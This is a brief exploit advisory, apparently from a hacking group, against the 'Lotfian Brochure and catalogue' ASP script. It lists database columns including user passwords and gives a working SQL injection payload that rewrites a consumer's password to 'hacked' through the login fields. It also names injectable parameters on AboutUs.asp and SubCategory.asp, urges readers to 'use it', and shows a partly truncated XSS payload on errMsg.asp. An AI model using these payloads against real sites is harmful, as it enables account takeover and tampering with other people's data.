Aria-Security Team http://Aria-Security.Net ---------------------------------------- Lotfian Brochure and cataloge Script XSS And SQL Injection Original Advisory @ http://aria-security.net/forum/showthread.php?p=1135 Username/Password Field can run SQL Queries, For Example I got these: Consumer.ConsumerID Consumer.ConsumerName' Consumer.ConsumerUserName Consumer.ConsumerPassword Consumer.Consumer Use Something like: 'update Consumer set Consumer.ConsumerPassword='hacked' where (ConsumerID='1');-- to update what you need [XSS] errMsg.asp?msg="> [Other Advanced SQL Injection] * AboutUs.asp?id=-1' Unclosed quotation mark? use it. *SubCategory.asp?ID=-1' Unclosed quotation mark? use it. HINT: suppose the first column name is a.BrochureName Credits Goes to Aria-Security Team Regards, The-0utl4w